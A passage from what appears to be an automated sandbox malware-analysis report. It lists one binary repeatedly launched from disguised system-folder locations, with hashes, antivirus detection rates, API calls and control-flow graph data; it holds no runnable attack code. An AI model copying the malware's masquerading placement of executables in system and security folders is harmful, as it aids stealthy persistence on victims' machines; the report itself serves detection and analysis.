                                                                                                                              Commandline:"C:\Windows\GameBarPresenceWriter\services.exe"
                                                                                                                              Imagebase:0x860000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:28
                                                                                                                              Start time:11:17:17
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                                              Imagebase:0xd50000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:31
                                                                                                                              Start time:11:17:25
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\GameBarPresenceWriter\services.exe"
                                                                                                                              Imagebase:0xcc0000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:32
                                                                                                                              Start time:11:17:33
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                                              Imagebase:0x9b0000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:33
                                                                                                                              Start time:11:17:41
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\GameBarPresenceWriter\services.exe"
                                                                                                                              Imagebase:0x9d0000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:34
                                                                                                                              Start time:11:17:49
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                                              Imagebase:0x520000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:35
                                                                                                                              Start time:11:17:58
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\GameBarPresenceWriter\services.exe"
                                                                                                                              Imagebase:0xd30000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:36
                                                                                                                              Start time:11:18:06
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                                              Imagebase:0x940000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 63%, ReversingLabs
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:37
                                                                                                                              Start time:11:18:15
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                                              Imagebase:0x60000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 63%, ReversingLabs
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:39
                                                                                                                              Start time:11:18:23
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                                              Imagebase:0x340000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:40
                                                                                                                              Start time:11:18:31
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                                              Imagebase:0x2f0000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Disassembly

                                                                                                                              Reset < >

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:5.6%
                                                                                                                                Dynamic/Decrypted Code Coverage:75%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:12
                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                execution_graph 15903 7ffd9b91af5d 15904 7ffd9b91af6b SuspendThread 15903->15904 15906 7ffd9b91b044 15904->15906 15907 7ffd9b91c744 15908 7ffd9b91c748 ResumeThread 15907->15908 15910 7ffd9b91c854 15908->15910 15911 7ffd9b91e525 15912 7ffd9b91e572 GetFileAttributesW 15911->15912 15914 7ffd9b91e605 15912->15914 15915 7ffd9b91c8a9 15916 7ffd9b91c8b7 CloseHandle 15915->15916 15918 7ffd9b91c994 15916->15918

                                                                                                                                Executed Functions

                                                                                                                                Function 00007FFD9B761AC5 Relevance: .3, Instructions: 275COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1751904295.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b760000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 75f97c1f608120b261a0465555d6dbd1f3153274291904ebedb9012a3a2c794b
                                                                                                                                • Instruction ID: 85c3ae913cd76f6b5f5cfb6b6c00eb89c7907083459dd028656edf19dd2a3329
                                                                                                                                • Opcode Fuzzy Hash: 75f97c1f608120b261a0465555d6dbd1f3153274291904ebedb9012a3a2c794b
                                                                                                                                • Instruction Fuzzy Hash: 95A1A071A14A8D8FE788DF58D8697EE7BE1FF59300F5002BAD009D76E6DB7828018741
                                                                                                                                Function 00007FFD9B91C744 Relevance: 1.7, APIs: 1, Instructions: 164threadCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754207568.00007FFD9B910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B910000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b910000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ResumeThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 947044025-0
                                                                                                                                • Opcode ID: 284831c4d3375332e040a4b7dcc5b2a4963ed3224cc0314f9a49f422debf72c7
                                                                                                                                • Instruction ID: 40f898509782262ae36b7e403b7e21097223711734ba3094b6daed6653710d1f
                                                                                                                                • Opcode Fuzzy Hash: 284831c4d3375332e040a4b7dcc5b2a4963ed3224cc0314f9a49f422debf72c7
                                                                                                                                • Instruction Fuzzy Hash: B0518E70E0874C8FDB55DFA8D895AEDBBF0EF5A310F0441ABD049DB292DA745846CB11
                                                                                                                                Function 00007FFD9B91AF5D Relevance: 1.6, APIs: 1, Instructions: 140threadinjectionCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 13 7ffd9b91af5d-7ffd9b91af69 14 7ffd9b91af74-7ffd9b91b042 SuspendThread 13->14 15 7ffd9b91af6b-7ffd9b91af73 13->15 18 7ffd9b91b044 14->18 19 7ffd9b91b04a-7ffd9b91b094 14->19 15->14 18->19
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754207568.00007FFD9B910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B910000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b910000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: SuspendThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3178671153-0
                                                                                                                                • Opcode ID: 6f0e49f39ebca6bc2e2795240bb7d88083f6c526a9e0087450466e88cd89bec7
                                                                                                                                • Instruction ID: 87ca1d2ecf525dd3dd199aa6369281ad7fa0e48cfceb1fa50d1d9209c38e0f15
                                                                                                                                • Opcode Fuzzy Hash: 6f0e49f39ebca6bc2e2795240bb7d88083f6c526a9e0087450466e88cd89bec7
                                                                                                                                • Instruction Fuzzy Hash: F0415E70E0864C8FDB59DF98D895BEDBBF0FB5A310F10416AD059E7252DA74A845CB40
                                                                                                                                Function 00007FFD9B91E525 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 22 7ffd9b91e525-7ffd9b91e603 GetFileAttributesW 25 7ffd9b91e605 22->25 26 7ffd9b91e60b-7ffd9b91e649 22->26 25->26
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754207568.00007FFD9B910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B910000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b910000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                • Opcode ID: 022a97dcda1abda9479d9095b4a831e463f8b1e33fb17cb108bf809f831b5907
                                                                                                                                • Instruction ID: 86daee6d1753403e65e44204b83204c5e6133c26f7e097a5091bc7b2ee035b58
                                                                                                                                • Opcode Fuzzy Hash: 022a97dcda1abda9479d9095b4a831e463f8b1e33fb17cb108bf809f831b5907
                                                                                                                                • Instruction Fuzzy Hash: 9F410870A08A1C8FDB99DF98D895BEDBBF0FB59310F10416AD009E7252DA719885CF40
                                                                                                                                Function 00007FFD9BE39DD8 Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                • Opcode ID: da32c76cc601ed70ac06b1127c3c88f102f9799dd8cf7c57f3fea4a7a02361f4
                                                                                                                                • Instruction ID: 46340d52debe4e978db8ddd10d6d800b2f11d5884dff7c6ccb0a8f36e8bb1fd6
                                                                                                                                • Opcode Fuzzy Hash: da32c76cc601ed70ac06b1127c3c88f102f9799dd8cf7c57f3fea4a7a02361f4
                                                                                                                                • Instruction Fuzzy Hash: 16513875E0A54E8FDB69DBD8C4655BDB7B5EF44300F5140BAD01FA72A2CB3A6A01CB40
                                                                                                                                Function 00007FFD9BE32188 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                • Opcode ID: 6b13f95b203724340ca73e0e58645aabe921899d07ff2dcec815d3f119f0382a
                                                                                                                                • Instruction ID: 177649012774bdba353e7e1c6574dbd7843e4b8124c584aceb0058553d631fc1
                                                                                                                                • Opcode Fuzzy Hash: 6b13f95b203724340ca73e0e58645aabe921899d07ff2dcec815d3f119f0382a
                                                                                                                                • Instruction Fuzzy Hash: E6519D71E1950E9FDB58DBD8D8A15FDB7B1FF48340F1141BAD05AE72A6CA392A01CB40
                                                                                                                                Function 00007FFD9B91C8A9 Relevance: 1.4, APIs: 1, Instructions: 143COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 97 7ffd9b91c8a9-7ffd9b91c8b5 98 7ffd9b91c8c0-7ffd9b91c992 CloseHandle 97->98 99 7ffd9b91c8b7-7ffd9b91c8bf 97->99 102 7ffd9b91c994 98->102 103 7ffd9b91c99a-7ffd9b91c9ee 98->103 99->98 102->103
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754207568.00007FFD9B910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B910000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b910000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                • Opcode ID: 6b287dee8b731397fc83ee703d497088e7453115300cb4f67bc71a7286233853
                                                                                                                                • Instruction ID: 7829d2dfefcd67a33df5cbd432ab148fd8181f1378bf4cf0743dbe02affd6cae
                                                                                                                                • Opcode Fuzzy Hash: 6b287dee8b731397fc83ee703d497088e7453115300cb4f67bc71a7286233853
                                                                                                                                • Instruction Fuzzy Hash: AF415B70A0865C8FDB59DFA8D894BEDBBF0EF5A311F1041AAD049E7292DA749885CB01
                                                                                                                                Function 00007FFD9BE33EA1 Relevance: 1.1, Instructions: 1068COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2718ae84c51cb8aec921d2483cb568e302613a2c763e75a336dee08912b9b15f
                                                                                                                                • Instruction ID: b9f9dccd1c57ab2afe56f3d19f507e171883f1c10d9344adae9909be0734fd4e
                                                                                                                                • Opcode Fuzzy Hash: 2718ae84c51cb8aec921d2483cb568e302613a2c763e75a336dee08912b9b15f
                                                                                                                                • Instruction Fuzzy Hash: 9D620D17E4F1A71FEB31B6A864B68F93FB49F1262470941F7E09D4D0E3DD0E26868681
                                                                                                                                Function 00007FFD9BE37D50 Relevance: .7, Instructions: 694COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 419 7ffd9be37d50-7ffd9be37d6a 420 7ffd9be37d70-7ffd9be37d80 419->420 421 7ffd9be3836c-7ffd9be38390 419->421 422 7ffd9be37d86-7ffd9be37dc1 420->422 423 7ffd9be383ca-7ffd9be383e0 420->423 428 7ffd9be37e5a-7ffd9be37e62 422->428 426 7ffd9be383e2-7ffd9be38406 423->426 427 7ffd9be3842a-7ffd9be3843d 423->427 429 7ffd9be37e68 428->429 430 7ffd9be37dc6-7ffd9be37dcf 428->430 431 7ffd9be37e72-7ffd9be37e8f 429->431 430->423 432 7ffd9be37dd5-7ffd9be37de0 430->432 437 7ffd9be37e96-7ffd9be37ea7 431->437 433 7ffd9be37de6-7ffd9be37dfa 432->433 434 7ffd9be37e6a-7ffd9be37e6e 432->434 435 7ffd9be37e53-7ffd9be37e57 433->435 436 7ffd9be37dfc-7ffd9be37e13 433->436 434->431 435->428 436->423 438 7ffd9be37e19-7ffd9be37e25 436->438 443 7ffd9be37ec0-7ffd9be37ecf 437->443 444 7ffd9be37ea9-7ffd9be37ebe 437->444 439 7ffd9be37e3f-7ffd9be37e50 438->439 440 7ffd9be37e27-7ffd9be37e3b 438->440 439->435 440->436 442 7ffd9be37e3d 440->442 442->435 448 7ffd9be37ef1-7ffd9be37f24 443->448 449 7ffd9be37ed1-7ffd9be37eec 443->449 444->443 454 7ffd9be37f84-7ffd9be37fa7 448->454 455 7ffd9be37f26-7ffd9be37f5e 448->455 456 7ffd9be38329-7ffd9be3835a 449->456 465 7ffd9be37fa8-7ffd9be37fad 454->465 461 7ffd9be37faf-7ffd9be37fd0 455->461 462 7ffd9be37f60-7ffd9be37f73 455->462 470 7ffd9be3835c-7ffd9be38366 456->470 471 7ffd9be37fd2-7ffd9be37ff6 461->471 462->423 464 7ffd9be37f79-7ffd9be37f82 462->464 464->454 465->462 468 7ffd9be37fae 465->468 468->461 470->420 470->421 473 7ffd9be37ffa 471->473 473->471 474 7ffd9be37ffc-7ffd9be3801b 473->474 476 7ffd9be3801d-7ffd9be38021 474->476 477 7ffd9be3808c-7ffd9be3809d 474->477 476->465 480 7ffd9be38023 476->480 478 7ffd9be3809e-7ffd9be380a1 477->478 481 7ffd9be380a7-7ffd9be380ab 478->481 482 7ffd9be3804c-7ffd9be3805d 480->482 483 7ffd9be380ad-7ffd9be380af 481->483 482->481 491 7ffd9be3805f-7ffd9be3806d 482->491 484 7ffd9be380b1-7ffd9be380bf 483->484 485 7ffd9be380f9-7ffd9be38101 483->485 487 7ffd9be38130-7ffd9be38145 484->487 488 7ffd9be380c1-7ffd9be380c5 484->488 489 7ffd9be38103-7ffd9be3810c 485->489 490 7ffd9be3814b-7ffd9be38153 485->490 487->490 488->482 498 7ffd9be380c7 488->498 495 7ffd9be3810f-7ffd9be38111 489->495 493 7ffd9be381db-7ffd9be381e9 490->493 494 7ffd9be38159-7ffd9be38172 490->494 496 7ffd9be3806f-7ffd9be38073 491->496 497 7ffd9be380de-7ffd9be380f3 491->497 500 7ffd9be381eb-7ffd9be381ed 493->500 501 7ffd9be3825a-7ffd9be3825b 493->501 494->493 499 7ffd9be38174-7ffd9be38175 494->499 502 7ffd9be38113-7ffd9be38115 495->502 503 7ffd9be38182-7ffd9be38184 495->503 496->473 512 7ffd9be38075 496->512 497->485 498->497 505 7ffd9be38176-7ffd9be3817a 499->505 507 7ffd9be381ef 500->507 508 7ffd9be38269-7ffd9be3826b 500->508 506 7ffd9be3828b-7ffd9be3828d 501->506 510 7ffd9be38191-7ffd9be38195 502->510 511 7ffd9be38117 502->511 523 7ffd9be38185-7ffd9be38187 503->523 518 7ffd9be3818e-7ffd9be38190 505->518 519 7ffd9be3817c-7ffd9be38180 505->519 514 7ffd9be3828f 506->514 515 7ffd9be382fe-7ffd9be38327 506->515 507->505 522 7ffd9be381f1 507->522 520 7ffd9be3826d-7ffd9be3826f 508->520 521 7ffd9be382dc 508->521 516 7ffd9be38211-7ffd9be3822b 510->516 517 7ffd9be38197 510->517 511->478 513 7ffd9be38119 511->513 512->477 524 7ffd9be3811e-7ffd9be38124 513->524 526 7ffd9be382ac-7ffd9be382ba 514->526 515->456 553 7ffd9be3825d-7ffd9be38266 516->553 554 7ffd9be3822d-7ffd9be3823b 516->554 517->524 527 7ffd9be38199 517->527 518->510 519->503 530 7ffd9be38271 520->530 531 7ffd9be382eb-7ffd9be382ef 520->531 528 7ffd9be382de-7ffd9be382e0 521->528 529 7ffd9be3834d-7ffd9be3835a 521->529 532 7ffd9be381f8-7ffd9be381fc 522->532 534 7ffd9be38208-7ffd9be38210 523->534 535 7ffd9be38188 523->535 539 7ffd9be381a0-7ffd9be381c5 524->539 552 7ffd9be38126 524->552 538 7ffd9be382bb-7ffd9be382c5 526->538 527->539 528->470 540 7ffd9be382e2 528->540 529->470 530->532 541 7ffd9be38273 530->541 542 7ffd9be382f1 531->542 543 7ffd9be3836b 531->543 544 7ffd9be381fe 532->544 545 7ffd9be38278-7ffd9be3827e 532->545 534->516 535->495 547 7ffd9be38189-7ffd9be3818a 535->547 548 7ffd9be382c7-7ffd9be382da 538->548 563 7ffd9be381c8-7ffd9be381d9 539->563 540->508 549 7ffd9be382e4 540->549 541->545 542->545 550 7ffd9be382f3 542->550 543->421 544->523 551 7ffd9be38200 544->551 556 7ffd9be38280 545->556 557 7ffd9be382fa-7ffd9be382fd 545->557 547->518 548->521 549->531 550->557 551->534 552->483 558 7ffd9be38128 552->558 553->508 554->526 559 7ffd9be3823d-7ffd9be3823f 554->559 556->548 561 7ffd9be38282-7ffd9be3828a 556->561 557->515 558->487 559->538 564 7ffd9be38241 559->564 561->506 563->493 563->499 564->563 565 7ffd9be38243 564->565 565->501
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 93b66e635e7b16bd6db651c48f25ccac5e111e2c4b120420995779f13fbe4a0b
                                                                                                                                • Instruction ID: 609a723e256c5cd1ec5808efc9f7d862cf9c5472e0916f190eceddf251514cf3
                                                                                                                                • Opcode Fuzzy Hash: 93b66e635e7b16bd6db651c48f25ccac5e111e2c4b120420995779f13fbe4a0b
                                                                                                                                • Instruction Fuzzy Hash: 5932A330B19A1D8FDBA8DB48C8A5A7973E6FF58310F5141B9D00EC72A2DE25ED45CB80
                                                                                                                                Function 00007FFD9BE33440 Relevance: .5, Instructions: 519COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 566 7ffd9be33440-7ffd9be3344e 567 7ffd9be33454-7ffd9be33466 call 7ffd9be32e10 566->567 568 7ffd9be335d1-7ffd9be335e5 566->568 573 7ffd9be33468-7ffd9be3346d 567->573 574 7ffd9be33435-7ffd9be33613 567->574 570 7ffd9be335e7 568->570 571 7ffd9be335ec-7ffd9be335f7 568->571 570->571 576 7ffd9be3348f-7ffd9be334a0 573->576 577 7ffd9be3346f-7ffd9be33473 573->577 581 7ffd9be3361a-7ffd9be33635 574->581 580 7ffd9be334a6-7ffd9be334bb 576->580 576->581 578 7ffd9be33573-7ffd9be33584 577->578 579 7ffd9be33479-7ffd9be3348a 577->579 583 7ffd9be33586 578->583 584 7ffd9be3358b-7ffd9be33596 578->584 579->568 580->581 582 7ffd9be334c1-7ffd9be334cd 580->582 590 7ffd9be3363d 581->590 591 7ffd9be33637 581->591 585 7ffd9be334cf-7ffd9be334e6 call 7ffd9be31920 582->585 586 7ffd9be334fe-7ffd9be33514 call 7ffd9be32e10 582->586 583->584 585->578 599 7ffd9be334ec-7ffd9be334fb call 7ffd9be31a50 585->599 586->578 598 7ffd9be33516-7ffd9be33521 586->598 594 7ffd9be3363f 590->594 595 7ffd9be33641-7ffd9be3364a 590->595 591->590 594->595 596 7ffd9be33681-7ffd9be33683 594->596 595->570 597 7ffd9be3364c-7ffd9be336a3 595->597 602 7ffd9be336ce-7ffd9be336ea 596->602 603 7ffd9be33685-7ffd9be33686 596->603 621 7ffd9be336ae-7ffd9be336b9 597->621 622 7ffd9be3366b-7ffd9be336a7 597->622 598->581 601 7ffd9be33527-7ffd9be3353c 598->601 599->586 601->581 606 7ffd9be33542-7ffd9be33555 601->606 607 7ffd9be33687-7ffd9be336a0 602->607 615 7ffd9be336ec-7ffd9be33700 602->615 603->607 609 7ffd9be33557-7ffd9be33571 call 7ffd9be31920 606->609 610 7ffd9be335a9-7ffd9be335b1 606->610 609->578 623 7ffd9be33597-7ffd9be335a6 call 7ffd9be31a50 609->623 616 7ffd9be335b9-7ffd9be335bc 610->616 624 7ffd9be337e8-7ffd9be337ed 615->624 620 7ffd9be335c3-7ffd9be335cb 616->620 620->568 627 7ffd9be3340a-7ffd9be33417 620->627 630 7ffd9be336bb 621->630 631 7ffd9be336a9 621->631 622->596 623->610 638 7ffd9be3371b-7ffd9be337f7 624->638 640 7ffd9be33801-7ffd9be3380e 624->640 627->620 632 7ffd9be3341d-7ffd9be33431 627->632 637 7ffd9be336bd-7ffd9be336cc 630->637 630->638 631->621 632->620 637->631 651 7ffd9be337cd-7ffd9be337e5 638->651 652 7ffd9be33746-7ffd9be33749 638->652 647 7ffd9be33810-7ffd9be3381f 640->647 648 7ffd9be3386e-7ffd9be33871 640->648 647->640 661 7ffd9be337e7 651->661 652->651 654 7ffd9be3374f-7ffd9be33752 652->654 657 7ffd9be33754-7ffd9be33781 654->657 658 7ffd9be337bb-7ffd9be337c2 654->658 659 7ffd9be337c4-7ffd9be337cc 658->659 660 7ffd9be33782-7ffd9be3379c 658->660 663 7ffd9be33821-7ffd9be3384a 660->663 664 7ffd9be337a2-7ffd9be337ad 660->664 661->624 663->661 669 7ffd9be3384c-7ffd9be3386c call 7ffd9be30080 663->669 664->663 665 7ffd9be337af-7ffd9be337b9 664->665 665->658 669->648
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bd3396010672576a68b6eb6e9c34f6b537f37cfd2d88a222b1e8890e37bbf227
                                                                                                                                • Instruction ID: a655de3dd909cd9684b91b2dee056a1e10152b638140ead7fedb3c83d8c857a1
                                                                                                                                • Opcode Fuzzy Hash: bd3396010672576a68b6eb6e9c34f6b537f37cfd2d88a222b1e8890e37bbf227
